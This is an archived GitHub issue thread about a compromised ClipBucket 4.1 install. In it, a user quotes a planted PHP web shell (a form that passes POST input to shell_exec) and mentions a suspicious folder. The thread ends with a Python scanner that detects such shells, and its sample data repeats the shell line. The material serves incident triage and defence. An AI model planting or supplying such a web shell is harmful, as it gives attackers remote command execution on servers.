This repository has been archived by the owner on Dec 1, 2022. It is now read-only.

Serious security issue #443

Open
ScaredDonut opened this issue Jul 3, 2018 · 3 comments

Comments

@ScaredDonut

So I am using ClipBucket 4.1. I was trying to get my "Please select your category" issue fixed during sign up. Accidentally I went to MyDomain.com/view_user.php?uid=1 and I was able to access my server's CLI. Luckily I had my permissions set correctly, but you can do some serious damage with this. I was able to download things and remove things.

@MacWarrior
Contributor

Hi,

This is what I have on https://mydomain.com/view_user.php?uid=1
(With and without SEO URL)
[screenshot: capture]

Your result may be a server configuration issue.

@ScaredDonut
Author

ScaredDonut commented Jul 3, 2018

Does seem to be on my end. I re-updated my ClipBucket and it still happened. It seems like someone accessed my server via alternative means.

because this is my view_user.php:

<form action="" method="post"><input type="text" style="width:200px" name="input"><button type="submit">Exec</button></form>
<pre>
<?php
if (isset($_POST['input'])) echo '$ ' . $_POST['input'] . "\n" . shell_exec($_POST['input']);
?>
</pre>

quick update:

Went through all the folders and I found a new folder as well: "actions/CB_BEATS_UPLOAD_DIR/"

My bad, seems like it was on my end. Don't know how they got access, but seems like all they did was my coins. Doesn't seem like there was anything malicious done.

view_user.php is not a file either on the original clipbucket.

@fahad-cb
Collaborator

Hello @itsflashpoint,
can you share the filenames inside the "actions/CB_BEATS_UPLOAD_DIR/" folder?
And also the create date for the folder and files?
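The triage the maintainer asks for above (which PHP files are not part of the stock install, and when they appeared) can be scripted. The following is an added example, not ClipBucket's own code: it walks an install, flags `.php` files missing from a manifest of shipped files or matching the pattern of the dropped `view_user.php` (request input passed straight to an exec-style function), and reports their mtime/ctime. The manifest and the sample files in `demo()` are constructed for the example.

```python
import re
import tempfile
import time
from pathlib import Path

# Functions that pass a string to the OS shell or evaluate it as PHP code.
EXEC_CALL = re.compile(r"\b(?:shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(")
# Superglobals that carry request-controlled input.
REQ_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")

def looks_like_webshell(src):
    """True when PHP source both reads request input and calls an exec-style function."""
    return bool(EXEC_CALL.search(src) and REQ_INPUT.search(src))

def scan_tree(root, manifest):
    """Report every .php file under root that is absent from the manifest of files
    shipped with the install, or that matches the web-shell pattern.
    st_mtime is the last content change; st_ctime is the last inode/metadata
    change (the closest thing to a 'create date' hint on Linux filesystems)."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*.php")):
        rel = p.relative_to(root).as_posix()
        unexpected = rel not in manifest
        suspicious = looks_like_webshell(p.read_text(errors="replace"))
        if unexpected or suspicious:
            st = p.stat()
            findings.append({
                "path": rel, "unexpected": unexpected, "webshell_pattern": suspicious,
                "mtime": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_mtime)),
                "ctime": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_ctime)),
            })
    return findings

def demo():
    """Build a constructed mini install in a temp dir and scan it (sample data, not a real site)."""
    manifest = {"index.php", "actions/video_upload.php"}  # constructed manifest
    files = {
        # shipped file: reads request input but never executes it
        "index.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
        # shipped file: runs a fixed command, no request input involved
        "actions/video_upload.php": '<?php $v = shell_exec("ffmpeg -version"); ?>',
        # the drop-in from the thread: request input straight into shell_exec
        "view_user.php": '<?php if (isset($_POST["input"])) echo shell_exec($_POST["input"]); ?>',
        # unknown file in the unexpected directory, harmless content
        "actions/CB_BEATS_UPLOAD_DIR/x.php": "<?php // placeholder ?>",
    }
    with tempfile.TemporaryDirectory() as d:
        for rel, src in files.items():
            path = Path(d, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(src)
        return scan_tree(d, manifest)
```

Run `demo()` to see the two flagged files; on a real install, build the manifest from a pristine copy of the same ClipBucket release and compare the reported timestamps against your deployment history.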
